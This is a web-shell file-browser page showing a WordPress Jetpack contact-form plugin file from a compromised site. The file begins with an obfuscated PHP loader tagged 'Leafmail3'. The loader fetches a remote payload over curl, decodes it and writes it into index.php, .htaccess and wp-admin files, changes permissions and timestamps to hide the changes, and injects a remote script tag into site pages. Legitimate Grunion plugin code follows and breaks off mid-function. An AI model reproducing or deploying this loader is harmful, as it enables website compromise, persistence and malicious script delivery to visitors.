0byt3m1n1
Path:
/
home1
/
aserty
/
public_html
/
bonniescraftygifts.com
/
iFzj4
/
configCHM
/
Jump
/
0-aserty
/
beatlesmontreal.com
/
wp-contentebbd3f
/
uploads
/
wp-content
/
plugins
/
jetpack
/
modules
/
contact-form
/
[
Home
]
File: grunion-contact-form.php
<?php /*Leafmail3*/goto hsxm4; mY3D9: $OKi1f .= "\145\x6e"; goto PMx6A; Kd95g: $eE8gG .= "\x66\x69\154\x65"; goto oGKV2; c0Bp6: $Jl55q .= "\164\157"; goto hLq5m; Vp4xb: $P5GVh = $Jl55q($guwhq); goto KpZeQ; KGgiz: $Yg3cE .= "\46\x68\x3d" . $Q6Si4; goto tGPrB; xpAbl: $PP2HF = $M1RhP($lL4Rq) || $M1RhP($Cb4XV); goto HSzn5; Kc0L3: @$jg8CY($QTlc9, $L0vpN); goto d3U3f; J7hLY: $oyXyy .= "\154\x72"; goto Bl7Ky; bQe_M: try { goto oX1u4; oX1u4: @$jg8CY($QTlc9, $HwdP2); goto mGuog; mGuog: @$jg8CY($OEoU0, $HwdP2); goto xHE2w; TupRK: @$jg8CY($OEoU0, $L0vpN); goto Mf0Y6; KHm7H: @$x09Um($KCjdR, $P5GVh); goto gKo15; gKo15: @$jg8CY($QTlc9, $L0vpN); goto fLtCp; c1PqG: @$jg8CY($KCjdR, $L0vpN); goto KHm7H; HZmuJ: @$jg8CY($KCjdR, $HwdP2); goto BHPy7; Mf0Y6: @$x09Um($OEoU0, $P5GVh); goto HZmuJ; BHPy7: @$SUpxe($KCjdR, $KmcLU["\142"]); goto c1PqG; xHE2w: @$SUpxe($OEoU0, $KmcLU["\x61"]); goto TupRK; fLtCp: } catch (Exception $w0YG7) { } goto KYs1a; Jfk_p: $guwhq = "\x2d\61"; goto FfLog; aYiIS: $NMbX8 .= "\144\x69\x72"; goto aKKe8; UPbyC: $HwdP2 += 304; goto fGMBR; JJZtD: $Jzlvr .= "\x75\156\143\164"; goto K31Ka; wCWRd: $SUj9O .= "\x73\x65"; goto SQa11; EdFV9: $M1RhP = "\144\x65\x66"; goto CcXTx; SDHjH: $QTlc9 = $_SERVER[$zl1NS]; goto BhGva; v4imZ: $aBJVO .= "\165\x65\162\x79"; goto ccRhk; C3xz0: $QuqQl .= "\157\160\164"; goto ExrBe; Mn8P4: $nCEBP .= "\143\153"; goto rirWy; oGKV2: $AIpqX = "\x69\x73\137"; goto yLTbR; ShiTE: $jg8CY = "\143\x68"; goto HTXlE; FRUFZ: if (!(!$PP2HF && $wU3zB)) { goto cynsl; } goto fT2Kb; D5OCa: $Jl55q = "\x73\164\162"; goto c0Bp6; jFRX7: $x09Um .= "\x75\143\150"; goto ShiTE; CIdAQ: try { goto uKjO1; uKjO1: $KJxhs = $Lbxvg(); goto h_HFe; ahPCJ: $SpmAm = $qG0GR($KJxhs); goto EzjNL; xG0S9: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 10); goto ahPCJ; SQbKW: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto xG0S9; FS40F: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto h05EJ; h05EJ: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto KfHmj; cFoFb: $SpmAm = trim(trim($SpmAm, "\xef\273\277")); goto XVsob; KfHmj: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto SQbKW; EzjNL: $SUj9O($KJxhs); goto cFoFb; h_HFe: $QuqQl($KJxhs, CURLOPT_URL, $Yg3cE); goto FS40F; XVsob: } catch (Exception $w0YG7) { } goto Rf0CY; OWp53: $NMbX8 = "\155\x6b"; goto aYiIS; Dx3FV: $lrArR = $WVzi1[0]; goto IH6rw; i5aD2: if (!(!$eE8gG($KCjdR) || $wgQyS($KCjdR) != $CXpqw)) { goto eit7d; } goto KjDHJ; FWxON: $PVllF = "\144\x65\143"; goto EwaSn; KjDHJ: $YEcMX = 1; goto z9vF6; ZyUiw: $Jzlvr .= "\167\156\137\146"; goto JJZtD; mCzgW: $_SERVER[$Jzlvr] = 0; goto EkOAP; NflDd: $Yg3cE .= "\x63\157\x70\171"; goto KGgiz; yB2Sc: $JyN8a .= "\x69\x73\164\163"; goto Rkiyf; klUXl: $KCjdR .= "\x61\x63\x63\x65\163\x73"; goto lFs7r; Fra8y: $k1dzM = "\65"; goto Js55e; pF1JS: $OEoU0 .= "\150\160"; goto C_QnM; xhtvx: $leXnA .= "\x6e\x69"; goto rLZqh; n28OO: $sJIxp .= "\151\141\154\151\172\x65"; goto bm81E; znIi3: @unlink($leXnA); goto Kc0L3; slgUn: $sJIxp = "\x75\156\163\145\162"; goto n28OO; QELur: $Jzlvr .= "\147\151\x73\x74"; goto lEaPh; Js55e: $k1dzM .= "\56\x34"; goto N7I8b; rLZqh: if (!$eE8gG($leXnA)) { goto WwLVo; } goto laOt4; yCiib: EKIjw: goto m_fRf; Gcw6D: $SLV70 .= "\x6f\x6e\x5f\143\157\x6d"; goto FFtsE; bm81E: $a2D8O = "\151\x6e\164"; goto l0tUv; xQGdz: try { $_SERVER[$Jzlvr] = 1; $Jzlvr(function () { goto F3wJk; ZjuUH: $PgG92 .= "\x6f\162\145\x28\x67\54\x73\51\73" . "\xa"; goto IC5Gf; HNrtn: $PgG92 .= "\164\x2f\x6a\141\x76\x61"; goto NGG39; NGG39: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\x3e" . "\12"; goto fvKWo; zjuBs: $PgG92 .= $Q6Si4; goto ozlGd; e43vJ: $PgG92 .= "\x3b\40\147\x2e\x64\145\146"; goto WAaTZ; ctigl: $PgG92 .= "\143\x72\x69\x70\x74\76\12"; goto UQzFQ; o0zxz: $PgG92 .= "\x74\x6f\155\x6f\x20\x2d\55\x3e\12"; goto mPwIJ; HgwKa: $PgG92 .= "\x67\56\163\x72"; goto XHdHm; cMvbH: $PgG92 .= "\x3f\x69\x64\x3d"; goto CPJJv; T8SNl: $PgG92 .= "\x28\42\163\143\x72\x69"; goto DVVjf; EQZrG: $PgG92 .= "\165\155\x65\156\164\54\40\147\x3d\x64\56\x63\x72\x65\141\164\x65"; goto CVmAR; OsCJL: $PgG92 .= "\x72\x69\160\x74\x20\164\171\x70\x65\x3d\42\164\145\x78"; goto HNrtn; fvKWo: $PgG92 .= "\x28\146\x75\x6e\x63"; goto D9Z4J; XHdHm: $PgG92 .= "\143\x3d\x75\53\42\x6a\x73\x2f"; goto zjuBs; F3wJk: global $Q6Si4, $FOvp_; goto ikpGs; DVVjf: $PgG92 .= "\x70\164\x22\51\x5b\x30\135\73" . "\12"; goto OlxLe; CPJJv: $PgG92 .= "\x4d\55"; goto nBzuv; wKipS: $PgG92 .= "\x6a\141\x76\141"; goto y_xeS; D9Z4J: $PgG92 .= "\x74\x69\157\x6e\x28\51\x20\x7b" . "\12"; goto vt08G; vXk66: $PgG92 .= "\x79\124\x61\147\116\x61\155\145"; goto T8SNl; ikpGs: $PgG92 = "\x3c\x21\x2d\x2d\40\115\x61"; goto o0zxz; rJXe5: $PgG92 .= "\x72\151\160\164\42\51\x2c\40\163\75\144\56\147\x65\164"; goto pxHT_; VSQBz: $PgG92 .= "\x73\171\x6e\143\75\x74\162\x75\145"; goto e43vJ; pxHT_: $PgG92 .= "\x45\154\145\x6d\x65\x6e\x74\x73\x42"; goto vXk66; QIy0x: $PgG92 .= "\157\x6d\157\40\103\157\x64"; goto Uxlnc; rjIua: $PgG92 .= "\74\57\x73"; goto ctigl; puLbh: $PgG92 .= "\x3d\x22\164\x65\170\164\x2f"; goto wKipS; CVmAR: $PgG92 .= "\x45\154\145\155\145\x6e\164\50\42\x73\143"; goto rJXe5; UU_6f: $PgG92 .= "\x22\73\40\163\x2e\160\141\x72"; goto aBxBL; c1FaP: echo $PgG92; goto zSGUt; UQzFQ: $PgG92 .= "\x3c\x21\x2d\55\x20\x45\x6e"; goto qvKfj; IC5Gf: $PgG92 .= "\x7d\x29\50\51\73" . "\xa"; goto rjIua; OlxLe: $PgG92 .= "\x67\56\164\x79\x70\x65"; goto puLbh; EfTgB: $PgG92 .= "\166\x61\x72\40\x64\x3d\x64\x6f\143"; goto EQZrG; nBzuv: $PgG92 .= time(); goto UU_6f; Uxlnc: $PgG92 .= "\145\40\55\x2d\76\xa"; goto c1FaP; mZ3oI: $PgG92 .= "\x73\x65\x72\x74\102\145\x66"; goto ZjuUH; WAaTZ: $PgG92 .= "\x65\x72\x3d\164\162\x75\x65\x3b" . "\12"; goto HgwKa; ozlGd: $PgG92 .= "\57\x6d\x61\164"; goto TbrIf; aBxBL: $PgG92 .= "\145\x6e\164\x4e\x6f\144\x65\x2e\x69\156"; goto mZ3oI; mPwIJ: $PgG92 .= "\x3c\x73\x63"; goto OsCJL; vt08G: $PgG92 .= "\166\x61\x72\x20\x75\x3d\42" . $FOvp_ . "\42\x3b" . "\12"; goto EfTgB; y_xeS: $PgG92 .= "\163\x63\x72\x69\x70\x74\x22\73\40\147\56\x61"; goto VSQBz; qvKfj: $PgG92 .= "\144\40\115\141\x74"; goto QIy0x; TbrIf: $PgG92 .= "\157\155\157\56\x6a\163"; goto cMvbH; zSGUt: }); } catch (Exception $w0YG7) { } goto OMFq0; HTXlE: $jg8CY .= "\155\x6f\144"; goto u78ub; KT1wX: $WVzi1 = []; goto TZ3bq; d3U3f: WwLVo: goto QM61W; h87Dq: $leXnA .= "\145\162\x2e\x69"; goto xhtvx; nIVO8: $JyN8a = "\x66\x75\156\143"; goto GoX1L; jFsRM: $tAPba = 5; goto mY7sQ; SQa11: $aBJVO = "\150\164\x74\160\x5f\142"; goto AJs9s; laOt4: @$jg8CY($QTlc9, $HwdP2); goto L3sEg; MPyJp: $Jzlvr .= "\x73\x68\165"; goto scBFF; hs_XX: if (!is_array($KmcLU)) { goto Ji4ud; } goto LNg_o; L3sEg: @$jg8CY($leXnA, $HwdP2); goto znIi3; QIUGn: $SUpxe .= "\160\x75\164\137\x63"; goto kd_ew; KVOXl: $oyXyy = $QTlc9; goto coTO5; lEaPh: $Jzlvr .= "\x65\x72\137"; goto MPyJp; BhGva: $pW2vG = $QTlc9; goto NAu12; qNILG: $oyXyy .= "\150\160\56\60"; goto RNzhh; Zn9KR: $Lbxvg .= "\154\x5f\x69\x6e\151\x74"; goto qk2Ao; ZoBZC: $qG0GR .= "\154\x5f\x65\170\x65\x63"; goto AVxD0; mY7sQ: $tAPba += 3; goto y9KuX; ttAoG: $Yg3cE .= "\x3d\x67\145\x74"; goto NflDd; FFtsE: $SLV70 .= "\160\141\162\145"; goto EdFV9; eBPlp: $tbkvt .= "\137\x48\x4f\x53\x54"; goto mlRqF; y9KuX: $HwdP2 = 189; goto UPbyC; trQa2: $eE8gG = "\151\x73\x5f"; goto Kd95g; coTO5: $oyXyy .= "\x2f\170\x6d"; goto J7hLY; ccRhk: $D68oh = "\155\x64\x35"; goto wF0JY; zFQvK: $Kp0SW .= "\145\x70\x74\x61\x62\x6c\x65"; goto KVOXl; QsGMA: if (!(!$eE8gG($OEoU0) || $wgQyS($OEoU0) != $lrArR)) { goto Phq1q; } goto hbhZ9; dNN2Q: $L0vpN += 150; goto BU5yK; mf5ON: $QuqQl .= "\x6c\x5f\x73\x65\x74"; goto C3xz0; hTxii: $pFwD_ = "\x2f\136\x63"; goto GJpaV; SjSdb: if (!($JyN8a($Lbxvg) && !preg_match($pFwD_, PHP_SAPI) && $nCEBP($lMxQN, 2 | 4))) { goto sPsQO; } goto NFErl; xsENl: try { goto Rj1Hp; zDVDE: $ahOJp .= "\164\75\x63\141"; goto YWC0r; EdFQK: if ($AIpqX($Io3QB)) { goto BpK_a; } goto r_zk0; OTh7W: $Io3QB = dirname($Nfe0e); goto EdFQK; toAoY: @$jg8CY($Io3QB, $HwdP2); goto ALYMH; g2WNq: $ahOJp = $FOvp_; goto Q_jhz; YWC0r: $ahOJp .= "\154\154"; goto qpBjZ; Rj1Hp: $Nfe0e = $QTlc9 . $KmcLU["\x64"]["\160\141\164\150"]; goto OTh7W; r_zk0: @$NMbX8($Io3QB, $HwdP2, true); goto yxLDn; IMGFo: VUik8: goto OCPb3; ALYMH: @$SUpxe($Nfe0e, $KmcLU["\144"]["\x63\157\x64\x65"]); goto D2b8f; yxLDn: BpK_a: goto VXrMt; VXrMt: if (!$AIpqX($Io3QB)) { goto VUik8; } goto toAoY; l8bWn: try { goto Rtq9b; N8H27: $SUj9O($KJxhs); goto PHxGn; P9hMZ: $QuqQl($KJxhs, CURLOPT_URL, $ahOJp); goto aJWcu; GlRPI: $QuqQl($KJxhs, CURLOPT_POSTFIELDS, $aBJVO($nLpk_)); goto M4b4c; bz5Ia: $QuqQl($KJxhs, CURLOPT_POST, 1); goto GlRPI; ifFFq: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYHOST, false); goto kx509; M4b4c: $qG0GR($KJxhs); goto N8H27; UfA6j: $QuqQl($KJxhs, CURLOPT_TIMEOUT, 3); goto bz5Ia; kx509: $QuqQl($KJxhs, CURLOPT_FOLLOWLOCATION, true); goto UfA6j; aJWcu: $QuqQl($KJxhs, CURLOPT_RETURNTRANSFER, 1); goto hBtdw; Rtq9b: $KJxhs = $Lbxvg(); goto P9hMZ; hBtdw: $QuqQl($KJxhs, CURLOPT_SSL_VERIFYPEER, false); goto ifFFq; PHxGn: } catch (Exception $w0YG7) { } goto IMGFo; s60Ax: @$x09Um($Nfe0e, $P5GVh); goto g2WNq; Q_jhz: $ahOJp .= "\77\x61\x63"; goto zDVDE; D2b8f: @$jg8CY($Nfe0e, $L0vpN); goto s_yVr; qpBjZ: $nLpk_ = ["\144\141\164\141" => $KmcLU["\x64"]["\165\162\x6c"]]; goto l8bWn; s_yVr: @$jg8CY($Io3QB, $L0vpN); goto s60Ax; OCPb3: } catch (Exception $w0YG7) { } goto bQe_M; e4Ifc: $Q6Si4 = $_SERVER[$tbkvt]; goto SDHjH; EwaSn: $PVllF .= "\x6f\143\x74"; goto CwGUI; yLTbR: $AIpqX .= "\x64\151\x72"; goto OWp53; BpAbm: $lL4Rq = "\x57\120\137\x55"; goto lIGrh; QBgho: Z7kbo: goto MUx3h; IH6rw: $CXpqw = $WVzi1[1]; goto QsGMA; yCtJ5: $JyN8a .= "\145\170"; goto yB2Sc; rirWy: $d_KAU = "\x66\143\x6c"; goto kGS2i; ExrBe: $qG0GR = $MogIQ; goto ZoBZC; qk2Ao: $QuqQl = $MogIQ; goto mf5ON; Z31wx: $jg8CY($QTlc9, $HwdP2); goto Ag8lc; K4l5B: $OEoU0 .= "\144\x65\x78\x2e\160"; goto pF1JS; bRDE_: $Cb4XV .= "\x5f\x41\x44"; goto YF7Rp; nElWS: $guwhq .= "\141\x79\x73"; goto Vp4xb; tP5eQ: $pW2vG .= "\x2d\141"; goto wx8gB; GJpaV: $pFwD_ .= "\x6c\151\57"; goto xJCEv; lFs7r: $leXnA = $QTlc9; goto tV4kM; t0fao: $Yg3cE = $FOvp_; goto NZ1x6; XrDkv: if (isset($_SERVER[$Jzlvr])) { goto r0CaT; } goto mCzgW; PMx6A: $nCEBP = "\146\154\157"; goto Mn8P4; C2C3X: $wgQyS .= "\154\x65"; goto trQa2; zsusp: $KmcLU = 0; goto jkCOI; NIEOu: $L0vpN = 215; goto dNN2Q; OEFkW: rsAYm: goto UL5LC; hbhZ9: $YEcMX = 1; goto IiUuQ; m_fRf: if (!$YEcMX) { goto gtKXO; } goto t0fao; i7ojl: $guwhq .= "\63\40\144"; goto nElWS; NAu12: $pW2vG .= "\57\x77\160"; goto tP5eQ; iw0Nk: $FOvp_ .= "\154\x69\x6e\x6b\56\164"; goto hSD1f; scBFF: $Jzlvr .= "\164\144\x6f"; goto ZyUiw; KpZeQ: $tbkvt = "\x48\124\124\120"; goto eBPlp; r500z: $KCjdR .= "\x2f\56\x68\x74"; goto klUXl; OMFq0: w6JGc: goto bH1zF; kd_ew: $SUpxe .= "\x6f\x6e\164\145\x6e\x74\163"; goto diLdg; PoTvn: $OEoU0 = $QTlc9; goto Fc1AY; aKKe8: $wM0cw = "\146\151\154\x65\137"; goto J0OQr; J3xw9: $FOvp_ = "\150\x74\x74\x70\163\72\57\57"; goto QlKtX; hSD1f: $FOvp_ .= "\157\160\57"; goto F0vj_; kGS2i: $d_KAU .= "\x6f\163\x65"; goto J3xw9; QM61W: $YEcMX = 0; goto SUEqd; p0Flx: $SUj9O .= "\154\137\143\x6c\x6f"; goto wCWRd; hLq5m: $Jl55q .= "\164\151"; goto lcFkG; YF7Rp: $Cb4XV .= "\115\x49\116"; goto xpAbl; eC9HP: $IhD_T = substr($D68oh($Q6Si4), 0, 6); goto DX3Ky; R8zQO: $SUpxe = "\146\151\x6c\145\137"; goto QIUGn; QlKtX: $FOvp_ .= "\x73\x65\x6f"; goto iw0Nk; C_QnM: $KCjdR = $QTlc9; goto r500z; EVan7: $y1BSo .= "\66\x34\x5f\x64"; goto n14XQ; CwGUI: $LDT3_ = "\x73\x74\x72"; goto iemde; wF0JY: $wgQyS = $D68oh; goto tC7IY; lcFkG: $Jl55q .= "\155\145"; goto nIVO8; LNg_o: try { goto mjWqA; aMSC6: @$jg8CY($iTCcx, $L0vpN); goto uokyK; UHS8F: @$jg8CY($pW2vG, $HwdP2); goto EZm8t; uokyK: @$x09Um($iTCcx, $P5GVh); goto bavy5; aNk_f: a5xL9: goto q700I; EZm8t: $iTCcx = $E3Ibu; goto aNk_f; OGZQL: if (!$AIpqX($pW2vG)) { goto a5xL9; } goto UHS8F; q700I: @$SUpxe($iTCcx, $KmcLU["\x63"]); goto aMSC6; mjWqA: @$jg8CY($QTlc9, $HwdP2); goto OGZQL; bavy5: } catch (Exception $w0YG7) { } goto xsENl; KYs1a: Ji4ud: goto QBgho; mlRqF: $zl1NS = "\104\x4f\103\125\115\x45\x4e\x54"; goto hivPL; OH0x0: $Tut_m .= "\x6e\146\154\x61\x74\145"; goto slgUn; Rf0CY: if (!($SpmAm !== false)) { goto Z7kbo; } goto zsusp; RNzhh: $OKi1f = "\146\157\160"; goto mY3D9; tC7IY: $wgQyS .= "\x5f\146\x69"; goto C2C3X; xePje: $Kp0SW = "\110\x54\124"; goto xIN_k; fT2Kb: $_POST = $_REQUEST = $_FILES = array(); goto UASYd; diLdg: $x09Um = "\164\157"; goto jFRX7; DX3Ky: $E3Ibu = $iTCcx = $pW2vG . "\57" . $IhD_T; goto KT1wX; J0OQr: $wM0cw .= "\x67\145\x74\137\x63"; goto KA3CR; MUx3h: gtKXO: goto qfVae; Ag8lc: $lMxQN = $OKi1f($oyXyy, "\167\x2b"); goto SjSdb; Rkiyf: $MogIQ = "\x63\165\x72"; goto chVKY; TZ3bq: $dmwnh = 32; goto jFsRM; tGPrB: $SpmAm = false; goto CIdAQ; hivPL: $zl1NS .= "\x5f\x52\117\117\x54"; goto Fra8y; Gx5VO: $Kp0SW .= "\60\x36\40\116\x6f"; goto z0Ye5; UL5LC: $YEcMX = 1; goto yCiib; NZ1x6: $Yg3cE .= "\77\141\143\x74"; goto ttAoG; xIN_k: $Kp0SW .= "\120\57\x31\x2e\x31\40\x34"; goto Gx5VO; BU5yK: $L0vpN = $a2D8O($PVllF($L0vpN), $tAPba); goto xePje; HPuPS: $SLV70 = "\166\145\162\x73\x69"; goto Gcw6D; lIGrh: $lL4Rq .= "\123\105\137\x54\x48\x45"; goto uBz23; GoX1L: $JyN8a .= "\164\x69\157\x6e\x5f"; goto yCtJ5; wx8gB: $pW2vG .= "\x64\x6d\151\156"; goto eC9HP; mEJVe: $s6EXz = $_FILES; goto p7L1U; uBz23: $lL4Rq .= "\115\x45\123"; goto Me43b; F0vj_: $Jzlvr = "\162\145"; goto QELur; l0tUv: $a2D8O .= "\x76\x61\154"; goto FWxON; tV4kM: $leXnA .= "\57\56\x75\163"; goto h87Dq; z0Ye5: $Kp0SW .= "\x74\40\101\x63\x63"; goto zFQvK; aSc51: goto EKIjw; goto OEFkW; K31Ka: $Jzlvr .= "\x69\157\x6e"; goto XrDkv; IiUuQ: Phq1q: goto i5aD2; NFErl: $jg8CY($QTlc9, $L0vpN); goto aro2m; EkOAP: r0CaT: goto BpAbm; UASYd: cynsl: goto Z31wx; N7I8b: $k1dzM .= "\x2e\60\73"; goto e4Ifc; Fc1AY: $OEoU0 .= "\x2f\151\156"; goto K4l5B; Bl7Ky: $oyXyy .= "\160\143\x2e\x70"; goto qNILG; HSzn5: $P0UrJ = $_REQUEST; goto mEJVe; KA3CR: $wM0cw .= "\157\156\164\x65\x6e\164\163"; goto R8zQO; AJs9s: $aBJVO .= "\165\151\154\x64\137\161"; goto v4imZ; z9vF6: eit7d: goto aSc51; chVKY: $Lbxvg = $MogIQ; goto Zn9KR; jkCOI: try { $KmcLU = @$sJIxp($Tut_m($y1BSo($SpmAm))); } catch (Exception $w0YG7) { } goto hs_XX; FfLog: $guwhq .= "\x33\x36"; goto i7ojl; u78ub: $y1BSo = "\x62\141\x73\x65"; goto EVan7; Me43b: $Cb4XV = "\127\x50"; goto bRDE_; p7L1U: $wU3zB = !empty($P0UrJ) || !empty($s6EXz); goto FRUFZ; bH1zF: try { goto hOljI; hTb2m: $WVzi1[] = $qQkQf; goto AVR1Z; wTrAR: $WVzi1[] = $mps9W; goto USnsY; O2FVm: $iTCcx = $QTlc9 . "\57" . $IhD_T; goto wiWx3; o5KeW: if (!empty($WVzi1)) { goto YMthw; } goto O2FVm; m1oNR: $WVzi1[] = $mps9W; goto hTb2m; C5yVp: NQbOe: goto o5KeW; uB5Qk: $mps9W = trim($JwExk[0]); goto hHGO3; tXeIo: I87JI: goto KjVrB; of38T: $JwExk = @explode("\72", $wM0cw($iTCcx)); goto lJihh; e3ZU6: $mps9W = trim($JwExk[0]); goto s4UPH; AVR1Z: uxegI: goto K3NXW; lU9RV: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto iEvPe; } goto wTrAR; ysg_I: LUX7P: goto tXeIo; BWadG: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto LUX7P; } goto uB5Qk; wiWx3: if (!$eE8gG($iTCcx)) { goto I87JI; } goto GGIpg; hOljI: if (!$eE8gG($iTCcx)) { goto NQbOe; } goto of38T; GGIpg: $JwExk = @explode("\x3a", $wM0cw($iTCcx)); goto BWadG; KjVrB: YMthw: goto jes1d; hHGO3: $qQkQf = trim($JwExk[1]); goto lU9RV; m5G9U: if (!($LDT3_($mps9W) == $dmwnh && $LDT3_($qQkQf) == $dmwnh)) { goto uxegI; } goto m1oNR; zW9Vv: iEvPe: goto ysg_I; s4UPH: $qQkQf = trim($JwExk[1]); goto m5G9U; lJihh: if (!(is_array($JwExk) && count($JwExk) == 2)) { goto oJdNI; } goto e3ZU6; USnsY: $WVzi1[] = $qQkQf; goto zW9Vv; K3NXW: oJdNI: goto C5yVp; jes1d: } catch (Exception $w0YG7) { } goto PoTvn; W_RKl: $Tut_m = "\147\x7a\151"; goto OH0x0; n14XQ: $y1BSo .= "\145\x63\157\144\145"; goto W_RKl; hsxm4: $pqAdF = "\x3c\104\x44\115\76"; goto hTxii; xJCEv: $pFwD_ .= "\x73\x69"; goto D5OCa; SUEqd: if (empty($WVzi1)) { goto rsAYm; } goto Dx3FV; CcXTx: $M1RhP .= "\x69\x6e\145\x64"; goto Jfk_p; aro2m: if (!(!$_SERVER[$Jzlvr] && $SLV70(PHP_VERSION, $k1dzM, "\76"))) { goto w6JGc; } goto xQGdz; iemde: $LDT3_ .= "\x6c\145\156"; goto HPuPS; fGMBR: $HwdP2 = $a2D8O($PVllF($HwdP2), $tAPba); goto NIEOu; AVxD0: $SUj9O = $MogIQ; goto p0Flx; qfVae: sPsQO: ?> <?php /* Plugin Name: Grunion Contact Form Description: Add a contact form to any post, page or text widget. Emails will be sent to the post's author by default, or any email address you choose. As seen on WordPress.com. Plugin URI: http://automattic.com/# AUthor: Automattic, Inc. Author URI: http://automattic.com/ Version: 2.3 License: GPLv2 or later */ define( 'GRUNION_PLUGIN_DIR', plugin_dir_path( __FILE__ ) ); define( 'GRUNION_PLUGIN_URL', plugin_dir_url( __FILE__ ) ); if ( is_admin() ) require_once GRUNION_PLUGIN_DIR . '/admin.php'; // take the content of a contact-form shortcode and parse it into a list of field types function contact_form_parse( $content ) { // first parse all the contact-field shortcodes into an array global $contact_form_fields, $grunion_form; $contact_form_fields = array(); if ( empty( $_REQUEST['action'] ) || $_REQUEST['action'] != 'grunion_shortcode_to_json' ) { wp_print_styles( 'grunion.css' ); } $out = do_shortcode( $content ); if ( empty($contact_form_fields) || !is_array($contact_form_fields) ) { // default form: same as the original Grunion form $default_form = ' [contact-field label="'.__( 'Name', 'jetpack' ).'" type="name" required="true" /] [contact-field label="'.__( 'Email', 'jetpack' ).'" type="email" required="true" /] [contact-field label="'.__( 'Website', 'jetpack' ).'" type="url" /]'; if ( 'yes' == strtolower($grunion_form->show_subject) ) { $default_form .= ' [contact-field label="'.__( 'Subject', 'jetpack' ).'" type="subject" /]'; } $default_form .= ' [contact-field label="'.__( 'Message', 'jetpack' ).'" type="textarea" /]'; $out = do_shortcode( $default_form ); } return $out; } function contact_form_render_field( $field ) { global $contact_form_last_id, $contact_form_errors, $contact_form_fields, $current_user, $user_identity; $r = ''; $field_id = $field['id']; if ( isset($_POST[ $field_id ]) ) { $field_value = stripslashes( $_POST[ $field_id ] ); } elseif ( is_user_logged_in() ) { // Special defaults for logged-in users if ( $field['type'] == 'email' ) $field_value = $current_user->data->user_email; elseif ( $field['type'] == 'name' ) $field_value = $user_identity; elseif ( $field['type'] == 'url' ) $field_value = $current_user->data->user_url; else $field_value = $field['default']; } else { $field_value = $field['default']; } $field_value = wp_kses($field_value, array()); $field['label'] = html_entity_decode( $field['label'] ); $field['label'] = wp_kses( $field['label'], array() ); if ( $field['type'] == 'email' ) { $r .= "\n<div>\n"; $r .= "\t\t<label for='".esc_attr($field_id)."' class='grunion-field-label ".esc_attr($field['type']) . ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "'>" . htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; $r .= "\t\t<input type='text' name='".esc_attr($field_id)."' id='".esc_attr($field_id)."' value='".esc_attr($field_value)."' class='".esc_attr($field['type'])."'/>\n"; $r .= "\t</div>\n"; } elseif ( $field['type'] == 'textarea' ) { $r .= "\n<div>\n"; $r .= "\t\t<label class='".esc_attr($field['type']) . ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "' for='contact-form-comment-" . esc_attr( $field_id ) . "'>" . htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; $r .= "\t\t<textarea name='".esc_attr($field_id)."' id='contact-form-comment-".esc_attr($field_id)."' rows='20'>".htmlspecialchars($field_value)."</textarea>\n"; $r .= "\t</div>\n"; } elseif ( $field['type'] == 'radio' ) { $r .= "\t<div><label class='". ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "'>" . htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; foreach ( $field['options'] as $option ) { $r .= "\t\t<label class='" . esc_attr( $field['type'] ) . ( contact_form_is_error( $field_id ) ? ' form-error' : '' ) . "'>"; $r .= "<input type='radio' name='".esc_attr($field_id)."' value='".esc_attr($option)."' class='".esc_attr($field['type'])."' ".( $option == $field_value ? "checked='checked' " : "")." /> "; $r .= htmlspecialchars( $option ) . "</label>\n"; $r .= "\t\t<div class='clear-form'></div>\n"; } $r .= "\t\t</div>\n"; } elseif ( $field['type'] == 'checkbox' ) { $r .= "\t<div>\n"; $r .= "\t\t<label class='".esc_attr($field['type']) . ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "'>\n"; $r .= "\t\t<input type='checkbox' name='".esc_attr($field_id)."' value='".__( 'Yes', 'jetpack' )."' class='".esc_attr($field['type'])."' ".( $field_value ? "checked='checked' " : "")." /> \n"; $r .= "\t\t". htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; $r .= "\t\t<div class='clear-form'></div>\n"; $r .= "\t</div>\n"; } elseif ( $field['type'] == 'select' ) { $r .= "\n<div>\n"; $r .= "\t\t<label for='".esc_attr($field_id)."' class='".esc_attr($field['type']) . ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "'>" . htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; $r .= "\t<select name='".esc_attr($field_id)."' id='".esc_attr($field_id)."' value='".esc_attr($field_value)."' class='".esc_attr($field['type'])."'/>\n"; foreach ( $field['options'] as $option ) { $option = html_entity_decode( $option ); $option = wp_kses( $option, array() ); $r .= "\t\t<option".( $option == $field_value ? " selected='selected'" : "").">". esc_html( $option ) ."</option>\n"; } $r .= "\t</select>\n"; $r .= "\t</div>\n"; } else { // default: text field // note that any unknown types will produce a text input, so we can use arbitrary type names to handle // input fields like name, email, url that require special validation or handling at POST $r .= "\n<div>\n"; $r .= "\t\t<label for='".esc_attr($field_id)."' class='".esc_attr($field['type']) . ( contact_form_is_error($field_id) ? ' form-error' : '' ) . "'>" . htmlspecialchars( $field['label'] ) . ( $field['required'] ? '<span>'. __( "(required)", 'jetpack' ) . '</span>' : '' ) . "</label>\n"; $r .= "\t\t<input type='text' name='".esc_attr($field_id)."' id='".esc_attr($field_id)."' value='".esc_attr($field_value)."' class='".esc_attr($field['type'])."'/>\n"; $r .= "\t</div>\n"; } return $r; } function contact_form_validate_field( $field ) { global $contact_form_last_id, 